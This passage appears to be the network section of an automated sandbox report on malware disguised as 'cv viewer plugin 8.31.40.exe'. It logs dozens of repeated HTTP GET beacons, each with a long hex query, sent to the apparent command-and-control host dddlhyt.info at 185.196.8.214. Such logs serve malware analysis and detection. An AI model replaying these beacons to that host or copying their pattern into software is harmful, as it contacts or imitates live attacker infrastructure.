                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.949733185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:32.241127014 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:32.995857000 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:33.108580112 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:33.355427980 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:33.468024015 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:33.704474926 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:33.812879086 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:34.049361944 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.949734185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:34.176178932 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:34.861285925 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:34.967875004 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:35.208873034 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.949735185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:35.333183050 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:36.033519983 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.949736185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:36.161164999 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:38.141935110 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:38.249074936 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:38.485059977 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.949737185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:38.614460945 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:39.346009016 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.949738185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:39.472913980 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:40.178509951 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:40 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.949739185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:40.301625967 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:40.984783888 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:40 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:41.092782021 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:41.332725048 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.949740185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:41.465652943 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:42.164752007 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.949741185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:42.287617922 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:42.991364956 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.949742185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:43.114336014 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:43.819664001 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:43 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.949743185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:43.961426020 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:44.674685001 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.949744185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:44.801167011 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:45.496061087 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:45.609050989 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:45.845361948 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.949745185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:46.089749098 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:46.818880081 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.949746185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:46.941888094 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:47.651432037 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:47 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.949747185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:47.770206928 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:48.459899902 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.949748185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:48.622296095 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:49.309113026 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:49.421412945 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:49.658382893 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:49.764575005 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:50.000968933 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:50.108288050 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:50.352996111 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.949749185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:50.477405071 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
